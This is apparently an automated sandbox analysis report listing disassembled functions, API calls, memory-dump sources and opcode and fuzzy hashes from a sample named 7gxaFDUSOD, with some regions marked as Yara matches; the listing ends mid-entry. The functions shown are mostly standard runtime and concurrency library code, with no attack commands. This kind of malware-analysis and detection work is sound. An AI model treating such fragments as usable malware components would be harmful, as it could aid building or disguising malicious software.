
Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02499330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0249934A

Part of subcall function 02499297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024992C6
Part of subcall function 02499297: ___AdjustPointer.LIBCMT ref: 024992E1

_UnwindNestedFrames.LIBCMT ref: 0249935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02499370
CallCatchBlock.LIBVCRUNTIME ref: 02499398

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 498d1580d0e3659feca5257187e3c93cc0b12885d0de557d3f13b2bc4cda5061
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: EF01D772100148BBDF125E96CC41EEB7F6EEF48754F05441DFE5896120D776E861EBA0

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024A5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378), ref: 024A51C8
GetLastError.KERNEL32(?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024A2213), ref: 024A51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024A51E2

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0ce62b76c3fdf1b0970068b8dd50a63813749d5e11aeb4b2c24ffea2a9e3c617
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 52017036E022226BD7214F789D54E777B98AF56F617500231FC05D7241C720C901CAE4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02496395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024963AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024963C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024963DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024963F3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: d319f3877fd5d38c43cc6a368d3d55f140f1a849d9a8719ef83febf945162c43
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 7E018636600114BBCF26EEA5D854AAF7B9E9F45750F01005BEC21AB391DAB1ED11CAA0

Function 02492B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 9818fd9ac03129c5d6a493833d4a97d73fd284c24edb29e5508bc53965df0ce4
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: B8118E76410204AFCB15EF65C880ACAFBF9BF59320F014A5FE9568B551DBB0E904CBA0

Function 02492B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02492BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF

Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8

Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 3ec0b07585b12f697fd9bc3453e88e054a5cfdc7649a1191d919e1ccde2fc13a
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 33012976410604ABCB24EF66C881EDAF7E9FF48320F008A1EE55A87650DBB0F944CF60

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 024750CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 024750D1

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 241021b39ed5283bc16d49de6027d1b95f759a6a168da68b97e6a5a38c3c5984
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: AA015371920208AFEB00EFA5C480BDDB7B1FF54316F50802ED465AB280CBB49988CF91

Function 02475B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02475B8D

Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02475BD8
__Getcoll.LIBCPMT ref: 02475BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02475BF7

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 8d215c1775b953af9906a528ed44feb6b412121d06d2ac5772888c845cf6d0a3
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: B00165719102089FDB00EFA5C480BEDB7B1BF14319F10842FD469AF280CBB89988CF90

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0248C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C1A4

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 9637257fbe7917bdb9b89250c74eea444ac72701f57a4c3a519b253b9b5d5a35
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1D01EF3A024109ABDF1BAE94DCC18BE3B66AB29650F088417F91884120D332C6B1AEA1

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 02483773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0248378C

Part of subcall function 02482B16: ___crtGetTimeFormatEx.LIBCMT ref: 02482B2C
Part of subcall function 02482B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02482B4B

GetLastError.KERNEL32 ref: 024837A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024837BE
__CxxThrowException@8.LIBVCRUNTIME ref: 024837CC

Part of subcall function 024828EC: SetThreadPriority.KERNEL32(?,?), ref: 024828F8

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: e51a998379e4b3c636d34c8559c38a4a408a90c82ab74436e28557c2a3370fe2
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 29F0A7B2A102153AE720FB769C06FBF3A9C9B01B51F50496BBD45E7181EED8D4048AB8

Function 0247D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02481342

Part of subcall function 02480BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02480BD6
Part of subcall function 02480BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02480BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02481355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02481361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0248136A

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: d4842b68a2eb84245293d0a70945d3623d9e5558dd8407c15733678881363b1e
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 5EF0B431621704A7AF147EB608105BE31975F51324B04416FE52A9F380DEB59E069A94

Function 0248D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0248D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0248D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0248D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0248D0CD

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 94217204aee43c245b57ddc909e2e4abb0a71c09cbc103126ec9398bb114652a
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 41F05931E11204E3C724FB66D840C9EB37A8E92B18770856FD805172C5DB31A94ACE62

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 02475A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02475A83
__Cnd_signal.LIBCPMT ref: 02475A8F
std::_Cnd_initX.LIBCPMT ref: 02475AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02475AAB

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 1d93e98a7279ee29cd4f44be268100be2dcdc93a5e947aa8c804c8063abbf2d6
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6FF0EC71410700DFEB317773D8057DA73A6AF01328F14451FD0795A990CFB5E8145E55

Function 02482858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

